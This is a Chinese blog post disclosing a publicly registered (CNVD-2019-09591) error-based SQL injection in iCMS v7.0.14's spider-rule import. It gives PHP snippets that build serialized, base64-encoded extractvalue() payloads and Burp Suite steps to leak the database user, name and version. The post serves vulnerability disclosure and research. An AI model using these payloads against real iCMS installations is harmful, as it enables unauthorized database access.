iCMS的spider_rule.admincp.php存在报错SQL注入

最新推荐文章于 2019-06-20 07:51:22 发布
最新推荐文章于 2019-06-20 07:51:22 发布
阅读量289 收藏
点赞数 1
分类专栏: PHP代码审计 文章标签: 渗透测试 代码审计 PHP代码审计 sql注入 云雕
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yun2diao/article/details/91959340
版权

该漏洞CNVD-ID: CNVD-2019-09591
漏洞提交CNVD后,待CNVD公示才发出本文。
测试环境:
程序版本:v7.0.14
Windows + firefox + burpsuite + apache2 + PHP5.6.27(phpStudy集成环境)
iCMS官网:https://www.icmsdev.com/

一、漏洞分析

/app/spider/spider_rule.admincp.php 传入文件的方式可被利用以绕过全局过滤导致SQL注入。
传入文件内容是序列化的,并经过base64编码,所以可绕过全局过滤。
在这里插入图片描述这里组装SQL语句。
/iPHP/core/iDB.class.php
在这里插入图片描述这里执行SQL语句。
/iPHP/core/DB/Mysqli.class.php
在这里插入图片描述

二、漏洞测试

1、 安装 http://localhost/install/index.php
2、 新建一个.php文件,写入如下代码:

<?php 
$str = array("name" => "aa1' or (select 1 from icms_user where uid=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))) or '");
$sstr = serialize($str);
$to64 = base64_encode($sstr);
echo $to64;
?>

在这里插入图片描述运行这段代码将得到一段payload,用于BurpSuite里执行。

3、 登录管理后台,选择“采集管理”:
在这里插入图片描述4、先选择“采集规则”, 再选择“导入规则”:
在这里插入图片描述在桌面新建一个.txt文件,写入任意内容。打开burpsuite拦截后选择“要导入的规则”,导入该.txt文件。
在这里插入图片描述5、burpsuite拦截,上面第二步得到的payload复制到这里;发到repeater
在这里插入图片描述6、repeater里分别获取user(), database(), version(), user()
在这里插入图片描述

<?php 
$str = array("name" => "aa1' or (select 1 from icms_user where uid=1 and (extractvalue(1,concat(0x7e,(select database()),0x7e)))) or '");
$sstr = serialize($str);
$to64 = base64_encode($sstr);
echo $to64;
?>

在这里插入图片描述

<?php 
$str = array("name" => "aa1' or (select 1 from icms_user where uid=1 and (extractvalue(1,concat(0x7e,(select version()),0x7e)))) or '");
$sstr = serialize($str);
$to64 = base64_encode($sstr);
echo $to64;
?>

在这里插入图片描述

云雕
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
icms_v7.0.0.zip_PHP_
08-09
icms_v7.0.0源码是全站源码,可投稿,上传新闻,SEO完整版
iCMS前台存储型XSS漏洞
云雕的博客
06-14 1345
漏洞CNVD-ID: CNVD-2019-10126 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境: 程序版本:v7.0.14 Windows + firefox + burpsuite + apache2 + PHP5.6.27(phpStudy集成环境) iCMS官网:https://www.icmsdev.com/ 一、漏洞分析 1、新用户注册时,输入注册邮箱,系统会自动查找数...
iCMS后台database.admincp文件存在SQL注入漏洞
云雕的博客
06-11 1034
iCMS后台database.admincp文件存在SQL注入漏洞目录一、漏洞分析二、漏洞测试 目录 该漏洞CNVD-ID: CNVD-2019-09079 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境: Windows + firefox + burpsuite + apache2 + PHP5.6.27(phpStudy集成环境) 注:PHP版本必须 >= 5.5才能运行该程...
代码审计】iCMS_v7.0.7 search.admincp.php页面存在SQL注入漏洞
12-03 675
  0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/download/release/iCMS7/latest 默认后台地址:http://127.0.0.1/admincp.php 默认账号密码:用户名密码自设 测试网站首页:   0x...
代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析
12-03 543
  0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/download/release/iCMS7/latest 默认后台地址:http://127.0.0.1/admincp.php 默认账号密码:用户名密码自设 测试网站首页:   0x...
代码审计】iCMS_v7.0.7 apps.admincp.php页面存在SQL注入漏洞分析
12-03 565
  0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/download/release/iCMS7/latest 默认后台地址:http://127.0.0.1/admincp.php 默认账号密码:用户名密码自设 测试网站首页:   0x...
php_iCMS v6.0.2.zip.zip
09-25
php_iCMS v6.0.2.zip.zip
iCMS.zip_bootstrap php_iCMS:marker:html_微信登陆_漏洞_简洁php项目
09-23
一套采用PHP和MySQL构建的高效简洁的内容管理系统,为您的网站提供一个完美的开源解决方案 面向多终端包括桌面、平板、手机 移动互联网 HTML5是移动互联网的未来。iCMS整合了HTML5框架 (Bootstrap),可用于快速开发...
iCMS v6.0.15
12-04
iCMS 是一套采用 PHP 和 MySQL 构建的高效简洁的内容管理系统,为您的网站提供一个完美的开源解决方案。
iCMS v8.0.0 beta.zip
最新发布
03-21
iCMS v8.0.0 beta.zip
iCMS后台do_query函数存在SQL注入漏洞
云雕的博客
06-12 949
目录 该漏洞CNVD-ID: CNVD-2019-08479 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境: 程序版本:v7.0.14 Windows + firefox + burpsuite + apache2 + PHP5.6.27(phpStudy集成环境) iCMS官网:https://www.icmsdev.com/ 一、漏洞分析 /app/database/databas...
iCMS的article.admincp.php和content.admincp.php模块存在SQL注入
云雕的博客
06-16 381
漏洞CNVD-ID: CNVD-2019-10031 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境: CMS版本:v7.0.14 Windows + firefox + burpsuite + apache2 + PHP5.6.27(phpStudy集成环境) iCMS官网:https://www.icmsdev.com/ 一、漏洞分析 /app/article/article.ad...
CatfishCMS任意命令执行导致getshell
云雕的博客
06-08 4814
CatfishCMS任意命令执行导致getshell目录一、 漏洞说明二、 漏洞测试三、漏洞修复: 目录 测试环境:windows + php5.4.45 +apache (phpStudy 集成环境) CMS 版本: v4.8.54(发布于2019年1月) 一、 漏洞说明 完整的payload为: s=dir&_method=__construct&method=*&fi...
百度ueditor编辑器的mini版umeditor所有语言版本的getContent文件存XSS漏洞
云雕的博客
06-10 2143
百度ueditor编辑器的mini版umeditor所有语言版本的getContent文件存XSS漏洞目录一、漏洞分析二、漏洞测试 目录 产品官网下载地址: https://ueditor.baidu.com/website/download.html#mini 涉及版本:php , asp, jsp, net 一、漏洞分析 存在漏洞的文件: /php/getContent.php /asp/ge...
JYmusic-2.0.0变量覆盖漏洞导致getshell
云雕的博客
06-08 1955
JYmusic-2.0.0变量覆盖漏洞导致getshell目录一、漏洞分析二、 漏洞测试 目录 测试环境:windows + php5.4.45 + apache2(phpStudy集成环境) 使用工具:BurpSuite、 PhpStorm 漏洞描述:变量覆盖,导致可传入系统命令进行执行,通过系统命令可写入shell。 CNVD-ID: CNVD-2019-06251 一、漏洞分析 通过危险函数...
TextpatternCMS安装插件时可以安装后门导致getshell
云雕的博客
06-20 1265
漏洞CNVD-ID: CNVD-2019-12530 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境:windows7 + firefox + Burpsuite + apache2 +php5.6.27 + mysql5.5.53 产品官网:https://textpattern.com/ github: https://github.com/textpattern/textpatt...
ThinkCMF存在CSRF漏洞可创建管理员账号
云雕的博客
06-17 602
thinkCMF官网: https://www.thinkcmf.com/ 一、POC 当管理员登录后,打开包含以下内容的网页,就会自动创建一个管理员账号。 注:需要把url变量中的http://tp.im更改为安装时设置的域名。 以下内容保存为一个html网页,如test.html。 <html><body> <script type="text/javascrip...
TextpatternCMS后台未过滤直接上传php导致getshell
云雕的博客
06-18 487
漏洞CNVD-ID: CNVD-2019-12539 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境:windows7 + firefox + Burpsuite + apache2 +php5.6.27 + mysql5.5.53 产品官网:https://textpattern.com/ github: https://github.com/textpattern/textpat...
icms_main_ddl.lst文件是什么
06-10
icms_main_ddl.lst文件是Oracle数据库中的一个文本文件,它包含了ICMS(Integrated Custody Management System,综合托管管理系统)的主要DDL(Data Definition Language,数据定义语言)语句。这些DDL语句用于创建...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值